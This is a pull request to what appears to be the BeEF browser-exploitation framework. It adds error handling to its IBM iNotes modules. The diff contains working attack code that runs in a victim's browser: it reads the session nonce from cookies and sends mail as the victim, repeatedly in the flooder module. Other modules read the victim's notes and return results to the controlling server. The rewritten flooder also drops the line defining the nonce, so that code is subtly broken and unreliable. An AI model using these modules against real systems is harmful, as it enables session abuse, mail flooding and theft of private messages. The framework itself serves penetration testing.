### PR TITLE
2364 inotes modules defect and error handling

### DIFF
--- a/modules/misc/ibm_inotes/extract_inotes_list/command.js
+++ b/modules/misc/ibm_inotes/extract_inotes_list/command.js
@@ -22,16 +22,24 @@ beef.execute(function() {
 	var currentURL = document.URL;
 	var rx = /(.*\.nsf)/g;
 	var arr = rx.exec(currentURL);
-	var notesURL = arr[1];
-	
-	var xhr = new XMLHttpRequest();
+
+	try {
+		var notesURL = arr[1];
+		var xhr = new XMLHttpRequest();
         xhr.open('GET', notesURL+'/%28$All%29?ReadViewEntries&KeyType=time&StartKey='+startdate+'T000000Z&UntilKey='+enddate+'T000000Z&Count='+count, true);
         xhr.onreadystatechange = function () {
         	if (xhr.readyState == 4 && xhr.status == 200) {
                		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+xhr.response);
-            	}
+            	} else {
+					beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Error: "+xhr.status);
+				}
         }
         xhr.send(null);
+	} catch(e) {
+		beef.debug("Error: " + e);
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Error, No NSF Database Found");
+	}
+	
 });
 
 

--- a/modules/misc/ibm_inotes/extract_inotes_list/command.js
+++ b/modules/misc/ibm_inotes/extract_inotes_list/command.js
@@ -37,7 +37,7 @@ beef.execute(function() {
         xhr.send(null);
 	} catch(e) {
 		beef.debug("Error: " + e);
-		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Error, No NSF Database Found");
+		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Error: "+e);
 	}
 	
 });

--- a/modules/misc/ibm_inotes/extract_inotes_list/module.rb
+++ b/modules/misc/ibm_inotes/extract_inotes_list/module.rb
@@ -16,7 +16,7 @@
 class Extract_inotes_list < BeEF::Core::Command
   def self.options
     [
-      { 'type' => 'label', 'html' => 'Provide date boundaries to retrieve a list of Notes:' },
+      { 'type' => 'label', 'name' => 'name', 'html' => 'Provide date boundaries to retrieve a list of Notes:' },
       { 'type' => 'textfield', 'name' => 'startdate', 'ui_label' => 'startdate yyyymmdd', 'value' => '20140101' },
       { 'type' => 'textfield', 'name' => 'enddate', 'ui_label' => 'enddate yyyymmdd', 'value' => '20500101' },
       { 'type' => 'textfield', 'name' => 'count', 'ui_label' => 'number of items returned', 'value' => '-1' }

--- a/modules/misc/ibm_inotes/inotes_flooder/command.js
+++ b/modules/misc/ibm_inotes/inotes_flooder/command.js
@@ -23,28 +23,34 @@ beef.execute(function() {
 	var currentURL = document.URL;
 	var rx = /(.*\.nsf)/g;
 	var arr = rx.exec(currentURL);
-	var notesURL = arr[1];
+
+	try {
+		var notesURL = arr[1];
+		
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Attempt to start flooding.');
 	
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Attempt to start flooding.');
+		(function flood() {
+			//extract nonce from ShimmerS-cookie
+				var cookies = document.cookie;
+				var rxc = /ShimmerS=.*?N:([A-Za-z0-9]*)/g;
+				var arrc = rxc.exec(cookies);
+				var xhr = new XMLHttpRequest();
+				var uri = notesURL + "/($Inbox)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_ShimmerEdit,s_ViewName;($Inbox),s_NotesForm;Memo&ui=dwa_form";
+				xhr.open("POST", uri, true);
+				xhr.withCredentials = true;
+				xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+				var post_data = "%25%25Nonce="+nonce+"&h_EditAction=h_Next&h_SetReturnURL=%5B%5B.%2F%26Form%3Dl_CallListener%5D%5D&h_SetCommand=h_ShimmerSendMail&h_SetSaveDoc=1&SendTo="+to+"&CopyTo=&BlindCopyTo=&Body="+body+"&MailOptions=1&Form=Memo&s_UsePlainText=0&s_UsePlainTextAndHTML=0&Subject="+subject;
+	
+				xhr.send(post_data);
+	
+				setTimeout( flood, delay );
+		})();
 
-	(function flood() {
-		//extract nonce from ShimmerS-cookie
-        	var cookies = document.cookie;
-        	var rxc = /ShimmerS=.*?N:([A-Za-z0-9]*)/g;
-        	var arrc = rxc.exec(cookies);
-        	var nonce = arrc[1];
+	} catch(e) {
+		beef.debug("[IBM Notes Flooder] Error: " + e);
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Flooder failed. Error: ' + e);
 
-        	var xhr = new XMLHttpRequest();
-        	var uri = notesURL + "/($Inbox)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_ShimmerEdit,s_ViewName;($Inbox),s_NotesForm;Memo&ui=dwa_form";
-        	xhr.open("POST", uri, true);
-        	xhr.withCredentials = true;
-        	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
-        	var post_data = "%25%25Nonce="+nonce+"&h_EditAction=h_Next&h_SetReturnURL=%5B%5B.%2F%26Form%3Dl_CallListener%5D%5D&h_SetCommand=h_ShimmerSendMail&h_SetSaveDoc=1&SendTo="+to+"&CopyTo=&BlindCopyTo=&Body="+body+"&MailOptions=1&Form=Memo&s_UsePlainText=0&s_UsePlainTextAndHTML=0&Subject="+subject;
-
-        	xhr.send(post_data);
-
-    		setTimeout( flood, delay );
-	})();
+	}
 });
 
 

--- a/modules/misc/ibm_inotes/inotes_flooder/module.rb
+++ b/modules/misc/ibm_inotes/inotes_flooder/module.rb
@@ -16,7 +16,7 @@
 class Inotes_flooder < BeEF::Core::Command
   def self.options
     [
-      { 'type' => 'label', 'html' => 'Send a note to someone with an attachment:' },
+      { 'type' => 'label', 'name' => 'name', 'html' => 'Send a note to someone with an attachment:' },
       { 'type' => 'textfield', 'name' => 'to', 'ui_label' => 'TO', 'value' => '' },
       { 'type' => 'textfield', 'name' => 'subject', 'ui_label' => 'Subject', 'value' => '' },
       { 'name' => 'body', 'ui_label' => 'Body', 'type' => 'textarea', 'value' => '' },

--- a/modules/misc/ibm_inotes/read_inotes/command.js
+++ b/modules/misc/ibm_inotes/read_inotes/command.js
@@ -20,6 +20,8 @@ beef.execute(function() {
 	var currentURL = document.URL;
 	var rx = /(.*\.nsf)/g;
 	var arr = rx.exec(currentURL);
+
+try {
 	var notesURL = arr[1];
 	
 	var xhr = new XMLHttpRequest();
@@ -30,6 +32,11 @@ beef.execute(function() {
 		}
 	}
 	xhr.send(null);
+} catch(e) {
+	beef.debug("Error: " + e);
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Read iNotes Error: "+e);
+}
+
 });
 
 

--- a/modules/misc/ibm_inotes/read_inotes/module.rb
+++ b/modules/misc/ibm_inotes/read_inotes/module.rb
@@ -16,7 +16,7 @@
 class Read_inotes < BeEF::Core::Command
   def self.options
     [
-      { 'type' => 'label', 'html' => 'Provide unid to retrieve details of a Note:' },
+      { 'type' => 'label', 'name' => 'name', 'html' => 'Provide unid to retrieve details of a Note:' },
       { 'type' => 'textfield', 'name' => 'unid', 'ui_label' => 'notes unid', 'value' => '1' }
     ]
   end

--- a/modules/misc/ibm_inotes/send_inotes/command.js
+++ b/modules/misc/ibm_inotes/send_inotes/command.js
@@ -22,24 +22,31 @@ beef.execute(function() {
 	var currentURL = document.URL;
 	var rx = /(.*\.nsf)/g;
 	var arr = rx.exec(currentURL);
-	var notesURL = arr[1];
 
-	//extract nonce from ShimmerS-cookie
-	var cookies = document.cookie;
-	var rxc = /ShimmerS=.*?N:([A-Za-z0-9]*)/g;
-	var arrc = rxc.exec(cookies);
-	var nonce = arrc[1];
+	try {
+		var notesURL = arr[1];
 	
-	var xhr = new XMLHttpRequest();
-	var uri = notesURL + "/($Inbox)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_ShimmerEdit,s_ViewName;($Inbox),s_NotesForm;Memo&ui=dwa_form";
-	xhr.open("POST", uri, true);
-	xhr.withCredentials = true;
-	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
-	var post_data = "%25%25Nonce="+nonce+"&h_EditAction=h_Next&h_SetReturnURL=%5B%5B.%2F%26Form%3Dl_CallListener%5D%5D&h_SetCommand=h_ShimmerSendMail&h_SetSaveDoc=1&SendTo="+to+"&CopyTo=&BlindCopyTo=&Body="+body+"&MailOptions=1&Form=Memo&s_UsePlainText=0&s_UsePlainTextAndHTML=0&Subject="+subject;
+		//extract nonce from ShimmerS-cookie
+		var cookies = document.cookie;
+		var rxc = /ShimmerS=.*?N:([A-Za-z0-9]*)/g;
+		var arrc = rxc.exec(cookies);
+		var nonce = arrc[1];
+		
+		var xhr = new XMLHttpRequest();
+		var uri = notesURL + "/($Inbox)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_ShimmerEdit,s_ViewName;($Inbox),s_NotesForm;Memo&ui=dwa_form";
+		xhr.open("POST", uri, true);
+		xhr.withCredentials = true;
+		xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+		var post_data = "%25%25Nonce="+nonce+"&h_EditAction=h_Next&h_SetReturnURL=%5B%5B.%2F%26Form%3Dl_CallListener%5D%5D&h_SetCommand=h_ShimmerSendMail&h_SetSaveDoc=1&SendTo="+to+"&CopyTo=&BlindCopyTo=&Body="+body+"&MailOptions=1&Form=Memo&s_UsePlainText=0&s_UsePlainTextAndHTML=0&Subject="+subject;
+	
+		xhr.send(post_data);
+	
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Attempt to send note.');
+	} catch(e) {
+		beef.debug("Error: " + e);
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Send iNotes Error: '+e);
+	}
 
-	xhr.send(post_data);
-
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Attempt to send note.');
 });
 
 

--- a/modules/misc/ibm_inotes/send_inotes/module.rb
+++ b/modules/misc/ibm_inotes/send_inotes/module.rb
@@ -16,7 +16,7 @@
 class Send_inotes < BeEF::Core::Command
   def self.options
     [
-      { 'type' => 'label', 'html' => 'Send a note to someone:' },
+      { 'type' => 'label', 'name' => 'name', 'html' => 'Send a note to someone:' },
       { 'type' => 'textfield', 'name' => 'to', 'ui_label' => 'TO:', 'value' => '' },
       { 'type' => 'textfield', 'name' => 'subject', 'ui_label' => 'Subject:', 'value' => '' },
       { 'name' => 'body', 'ui_label' => 'Body', 'type' => 'textarea', 'value' => '' }

--- a/modules/misc/ibm_inotes/send_inotes_with_attachment/command.js
+++ b/modules/misc/ibm_inotes/send_inotes_with_attachment/command.js
@@ -23,89 +23,95 @@ beef.execute(function() {
 	//get URL for this nsf databse
 	var currentURL = document.URL;
 	var rx = /(.*\.nsf)/g;
-	var arr = rx.exec(currentURL);
-	var notesURL = arr[1];
 
-	//extract nonce from ShimmerS-cookie
-	var cookies = document.cookie;
-	var rxc = /ShimmerS=.*?N:([A-Za-z0-9]*)/g;
-	var arrc = rxc.exec(cookies);
-	var nonce = arrc[1];
-	
-	var xhr = new XMLHttpRequest();
-	var uri = notesURL + "/($Inbox)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_ShimmerEdit,s_ViewName;($Inbox),s_NotesForm;Memo&ui=dwa_form";
-	xhr.open("POST", uri, true);
-	xhr.withCredentials = true;
-
-	var boundary = "---------------------------32162600713994";
-
-	xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
-
-
-	var post_data = boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"%%Nonce\"\r\n";
-	post_data += "\r\n";
-	post_data += nonce + "\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"h_EditAction\"\r\n";
-	post_data += "\r\n";
-	post_data += "h_Next\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"h_SetReturnURL\"\r\n";
-	post_data += "\r\n";
-	post_data += "[[./&Form=l_CallListener]]\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"h_SetCommand\"\r\n";
-	post_data += "\r\n";
-	post_data += "h_ShimmerSendMail\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"h_SetSaveDoc\"\r\n";
-	post_data += "\r\n";
-	post_data += "1\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"SendTo\"\r\n";
-	post_data += "\r\n";
-	post_data += to + "\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"CopyTo\"\r\n";
-	post_data += "\r\n";
-	post_data += "\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"BlindCopyTo\"\r\n";
-	post_data += "\r\n";
-	post_data += "\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"Body\"\r\n";
-	post_data += "\r\n";
-	post_data += body + "\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"MailOptions\"\r\n";
-	post_data += "\r\n";
-	post_data += "1\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"Form\"\r\n";
-	post_data += "\r\n";
-	post_data += "Memo\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"s_UsePlainText\"\r\n";
-	post_data += "\r\n";
-	post_data += "0\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"s_UsePlainTextAndHTML\"\r\n";
-	post_data += "\r\n";
-	post_data += "1\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"Subject\"\r\n";
-	post_data += "\r\n";
-	post_data += subject + "\r\n";
-	post_data += boundary + "\r\n";
-	post_data += "Content-Disposition: form-data; name=\"HaikuUploadAttachment0\";  filename=\"" + filename + "\"\r\n";
-	post_data += "\r\n";
-	post_data += filedata + "\r\n";
-	post_data += boundary + "--";
-	xhr.sendAsBinary(post_data);
-
-	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Attempt to send note.');
+	try {
+			var arr = rx.exec(currentURL);
+			var notesURL = arr[1];
+		
+			//extract nonce from ShimmerS-cookie
+			var cookies = document.cookie;
+			var rxc = /ShimmerS=.*?N:([A-Za-z0-9]*)/g;
+			var arrc = rxc.exec(cookies);
+			var nonce = arrc[1];
+			
+			var xhr = new XMLHttpRequest();
+			var uri = notesURL + "/($Inbox)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_ShimmerEdit,s_ViewName;($Inbox),s_NotesForm;Memo&ui=dwa_form";
+			xhr.open("POST", uri, true);
+			xhr.withCredentials = true;
+		
+			var boundary = "---------------------------32162600713994";
+		
+			xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + boundary);
+		
+		
+			var post_data = boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"%%Nonce\"\r\n";
+			post_data += "\r\n";
+			post_data += nonce + "\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"h_EditAction\"\r\n";
+			post_data += "\r\n";
+			post_data += "h_Next\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"h_SetReturnURL\"\r\n";
+			post_data += "\r\n";
+			post_data += "[[./&Form=l_CallListener]]\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"h_SetCommand\"\r\n";
+			post_data += "\r\n";
+			post_data += "h_ShimmerSendMail\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"h_SetSaveDoc\"\r\n";
+			post_data += "\r\n";
+			post_data += "1\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"SendTo\"\r\n";
+			post_data += "\r\n";
+			post_data += to + "\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"CopyTo\"\r\n";
+			post_data += "\r\n";
+			post_data += "\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"BlindCopyTo\"\r\n";
+			post_data += "\r\n";
+			post_data += "\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"Body\"\r\n";
+			post_data += "\r\n";
+			post_data += body + "\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"MailOptions\"\r\n";
+			post_data += "\r\n";
+			post_data += "1\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"Form\"\r\n";
+			post_data += "\r\n";
+			post_data += "Memo\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"s_UsePlainText\"\r\n";
+			post_data += "\r\n";
+			post_data += "0\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"s_UsePlainTextAndHTML\"\r\n";
+			post_data += "\r\n";
+			post_data += "1\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"Subject\"\r\n";
+			post_data += "\r\n";
+			post_data += subject + "\r\n";
+			post_data += boundary + "\r\n";
+			post_data += "Content-Disposition: form-data; name=\"HaikuUploadAttachment0\";  filename=\"" + filename + "\"\r\n";
+			post_data += "\r\n";
+			post_data += filedata + "\r\n";
+			post_data += boundary + "--";
+			xhr.sendAsBinary(post_data);
+		
+			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Attempt to send note.');
+	 } catch(e) {
+		 beef.debug("Error: " + e);
+		 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Error: ' + e);
+	}
 });
 
 

--- a/modules/misc/ibm_inotes/send_inotes_with_attachment/module.rb
+++ b/modules/misc/ibm_inotes/send_inotes_with_attachment/module.rb
@@ -16,7 +16,7 @@
 class Send_inotes_with_attachment < BeEF::Core::Command
   def self.options
     [
-      { 'type' => 'label', 'html' => 'Send a note to someone with an attachment:' },
+      { 'type' => 'label', 'name' => 'name', 'html' => 'Send a note to someone with an attachment:' },
       { 'type' => 'textfield', 'name' => 'to', 'ui_label' => 'TO', 'value' => '' },
       { 'type' => 'textfield', 'name' => 'subject', 'ui_label' => 'Subject', 'value' => '' },
       { 'name' => 'body', 'ui_label' => 'Body', 'type' => 'textarea', 'value' => '' },


### PR DESCRIPTION
# Pull Request

Thanks for submitting a PR! Please fill in this template where appropriate:

## Category
Bug fix

## Feature/Issue Description
As per #2364 https://github.com/beefproject/beef/issues/2364 there was a spelling mistake within the IBM inotes modules which caused it to fail. Additionally there was no handling where the module could not find the target nsf url.

**Q:** Give a technical rundown of what you have changed (if applicable)
1. Fixed spelling mistake per Bcoles suggestions in #2364 
2. Added 'name' to the `options` object for each module as per Bcoles suggestions
3. Added a bandaid try/catch to the function so that it does not error but fails and returns the error to the UI. While the module  group should ideally be rewritten to handle fails better, this at least allows it to be run without crashing

## Test Cases
No rspec tests written, but I have run through each module post this fix and it fails and reports error correctly.

## Wiki Page
No wiki updates needed
